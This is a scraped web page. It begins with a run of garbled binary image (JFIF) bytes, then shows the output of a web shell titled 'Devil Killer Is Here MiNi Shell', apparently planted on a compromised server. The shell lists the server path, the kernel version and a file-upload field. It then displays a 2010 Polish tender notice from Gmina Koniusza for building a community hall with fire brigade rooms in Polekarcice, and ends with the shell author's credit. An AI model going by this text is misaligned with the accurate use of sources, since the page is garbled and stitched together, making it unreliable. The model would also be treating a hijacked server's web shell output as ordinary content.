JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100108/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100108/6438-N-2010.html

<p class="kh_header"><b>Koniusza: Budowa Domu Ludowego wraz z pomieszczeniami Ochotniczej Straży Pożarnej 
w miejscowości Polekarcice</b><br>
<b>Numer ogłoszenia: 6438 - 2010; data zamieszczenia: 08.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Koniusza , Koniusza 55, 32-104 Koniusza, woj. małopolskie, tel. 012 3869039, faks 012 3869015.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koniusza.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Domu Ludowego wraz z pomieszczeniami Ochotniczej Straży Pożarnej 
w miejscowości Polekarcice.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest :  budowa Domu Ludowego wraz z pomieszczeniami Ochotniczej Straży Pożarnej w miejscowości Polekarcice.
Zakres robót budowlanych obejmuje realizację  budynku parterowego z poddaszem, niepodpiwniczonego, o konstrukcji monolitycznej tradycyjnej, z dachem dwuspadowym. Budynek jest funkcjonalnie podzielony na część garażową ( z magazynem sprzętu i kotłownią) przeznaczoną do dla samochodu gaśniczego,  oraz na część przeznaczoną do organizowania imprez i zebrań. 
Należy wykonać : roboty ziemne, fundamenty, posadzki na gruncie, zbrojenie konstrukcji, ściany zewnętrzne, strop i schody, ściany wewnętrzne, dach budynku z pokryciem i obróbką, tynki, stolarkę okienną i drzwiową, malowanie i glazurę, elementy kowalsko-ślusarskie, podłogi i posadzki, elewacje, montaż syreny alarmowej, szambo, instalacje elektryczne , instalacje sanitarne z przyłączami , wyposażenie domu ludowego, oraz roboty drogowe wraz z zagospodarowaniem terenu .  Powierzchnia zabudowy - 285,00m2, powierzchnia netto -431,95 m2, powierzchnia użytkowa części usługowej - 427,74 m2, kubatura 2205,00 m3.
Inwestycja  jest dofinansowana w ramach Działania Odnowa i Rozwój wsi objętego PROW na lata 2007-2013.Szczegółowy opis przedmiotu zamówienia zawiera SIWZ.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.10.00.00-8, 45.23.32.26-9, 45.22.32.00-8, 45.31.00.00-3, 45.33.11.00-7, 45.33.30.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 20 000,00 zł   (słownie : dwadzieścia tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy którzy spełniają warunki dotyczące :
 1.posiadania  uprawnień do wykonywania określonej działalności  lub czynności, jeżeli 
przepisy  prawa  nakładają obowiązek ich posiadania;
2.posiadania wiedzy i doświadczenia : Zamawiający wymaga, aby Wykonawca wykazał,  że wykonał  w okresie ostatnich pięciu lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną robotę budowlaną polegającą na  budowie lub  przebudowie  jednego budynku wraz z instalacjami  o wartości nie mniejszej niż 1 000 000,00 zł brutto oraz  posiada dokument potwierdzający, że robota  została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona.
( Za  budynek Zamawiający  uważa budynek mieszkalny, budynek zamieszkania zbiorowego oraz budynek użyteczności publicznej wg definicji zawartej w § 3 pkt 4-6 Rozporządzenia Ministra Infrastruktury z dnia 12.04.2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. z 2002 r. Nr 75, poz. 690 z późn. zm.),
3.dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia :  Zamawiający wymaga, aby Wykonawca wykazał, że 
dysponuje osobą  na stanowisko kierownika budowy odpowiedzialną  za realizację zamówienia,  posiadającą uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności  konstrukcyjno-budowlanej, upoważniające  do kierowania robotami związanymi z realizacją przedmiotu zamówienia, wymagane doświadczenie zawodowe- minimum 1 zadanie z zakresu budowy, przebudowy budynku jako kierownik budowy, lub robót.
4.sytuacji ekonomicznej i finansowej : wykonawca musi udokumentować, że  jest ubezpieczony   od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia  na kwotę w  wysokości minimum 400 000,00 złotych.
Zamawiający dokona oceny spełnienia ww. warunków wg formuły spełnia - nie spełnia   na podstawie złożonych wraz z ofertą oświadczeń i dokumentów określonych poniżej ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Wypełniony formularz ofertowy (wg załącznika Nr 1 do SIWZ ).
2.Kosztorys ofertowy sporządzony zgodnie z pkt.16 SIWZ.
3.Oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu określone 
w art.22 ust.1 ustawy,  i braku podstaw do wykluczenia z powodu  niespełniania warunków, o których mowa w art.24 ust.1ustawy z dnia 29 stycznia 2004 r. Prawo Zamówień Publicznych (tj. Dz. U. z 2007 r. Nr 223, poz.1655 z późn. zm.) ( wg załącznika Nr 2 do SIWZ). 
4.Wcelu wykazania  braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach , o których mowa w art.24ust.1ustawy Zamawiający żąda  następujących dokumentów : 
4.1. Aktualnego odpisu  z właściwego   rejestru ,  jeżeli odrębne przepisy wymagają  wpisu do rejestru , w celu wykazania braku podstaw do wykluczenia w oparciu o art.24 ust.1 pkt 2 ustawy, wystawionego  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art.24 ust.1 pkt 2 ustawy.
4.2.Aktualnego  zaświadczenia  właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia , że uzyskał  przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego  nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4.3.Aktualnego zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne,  lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego  nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
5.Na potwierdzenie spełnienia warunków udziału opisanych  w sekcji III.2) pkt2, 3, 4,  Wykonawcy winni przedłożyć następujące dokumenty: 
5.1.Wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, tj. wykaz wykonanej  co najmniej jednej roboty budowlanej  polegającej na  budowie lub  przebudowie  jednego budynku wraz z instalacjami  o wartości nie mniejszej niż 1 000 000,00 zł brutto, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z  zasadami sztuki budowlanej i prawidłowo ukończone  (wg załącznika nr 3 do SIWZ ). 
5.2.Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia odpowiedzialnych za kierowanie robotami budowlanymi (co najmniej 1 osoby na stanowisko kierownika budowy ) wraz z informacjami na temat ich kwalifikacji  zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją  o podstawie do dysponowania tymi osobami (wg załącznika nr 4 do SIWZ ).Wykazana osoba na stanowisko kierownika budowy musi  posiadać uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności  konstrukcyjno-budowlanej, upoważniające  do kierowania robotami związanymi z realizacją przedmiotu zamówienia, doświadczenie zawodowe- minimum 1 zadanie z zakresu budowy, przebudowy budynku jako kierownik budowy, lub robót.  
5.3.Opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego , że Wykonawca na dzień składania oferty  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę w  wysokości minimum 400 000,00 złotych.
5.3a).Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów, dotyczących sytuacji finansowej i ekonomicznej  wymaganych przez zamawiającego, może przedstawić inny dokument,  który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku. 
6.Wykonawcom, którzy podali wymagane  wartości robót i ubezpieczenia w walucie innej niż PLN, Zamawiający przeliczy te dane, celem sprawdzenia spełnienia warunków, wg średniego kursu Narodowego Banku Polskiego (NBP) Tabela A , opublikowanego w dniu ukazania się Ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych.
7. Dowód wniesienia wadium :
a)	w przypadku składania wadium w formach innych niż pieniądz -  oryginał dokumentu zgodnie z pkt. 12.5 SIWZ,
b)	do oferty  dołączyć kserokopię wniesienia wadium potwierdzoną za zgodność
z oryginałem przez Wykonawcę .	
8.Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium 
 Rzeczypospolitej Polskiej, zamiast dokumentów o których mowa : 
 w pkt4 składa dokument lub dokumenty, wystawione  w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: 
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości ( wystawiony nie wcześniej niż  6 miesięcy przed upływem terminu składnia ofert), 
b)	nie zalega  z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu  
( wystawiony nie wcześniej niż  3 miesięcy przed upływem terminu składnia ofert), 
9.Jeżeli w miejscu zamieszkania osoby  lub w kraju , w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt8 zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania  osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania - wystawionym odpowiednio jak w pkt8.
10.Dokumenty należy złożyć w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. W przypadku składania elektronicznych dokumentów powinny być one opatrzone przez wykonawcę bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu. 
Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona  kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości. 
11.Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
12.Zasady składania oferty przez podmioty występujące wspólnie ( konsorcjum, spółka cywilna) : 
12.1. W przypadku, gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia,   ustanawiają pełnomocnika do reprezentowania ich w postępowaniu  o  udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy  w  sprawie zamówienia publicznego. Pełnomocnictwo w formie oryginału lub pełnomocnictwo poświadczone notarialnie należy załączyć do oferty.
12.2.Wymagane oświadczenia i dokumenty wskazane w pkt3 i 4 powinny być złożone przez każdego Wykonawcę wspólnej oferty, natomiast dokumenty wymienione w ppkt.5.1., 5.2., 5.3. winien przedłożyć w imieniu wszystkich ten, lub ci spośród  Wykonawców składających wspólną ofertę, którzy spełniają warunki zawarte w tych podpunktach.
12.3.W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia kopie dokumentów dotyczących odpowiednio wykonawcy  są poświadczone za zgodność z oryginałem przez wykonawcę. 
13.Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia  lub zdolnościach finansowych  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. W takiej sytuacji przedmiotowe pisemne zobowiązanie Wykonawca winien dodatkowo załączyć do oferty. Kopie dokumentów dotyczące podmiotów są poświadczone za zgodność z oryginałem przez te podmioty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.koniusza.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Koniuszy, Koniusza 55, 32-104 Koniusza, pok. nr 14 lub za zaliczeniem pocztowym. Cena za materiały przetargowe w formie papierowej wynosi 200,00 zł..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2010 godzina 10:00, miejsce: Urząd Gminy w Koniuszy, Koniusza 55, 32-104 Koniusza, pok. nr 11 (sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com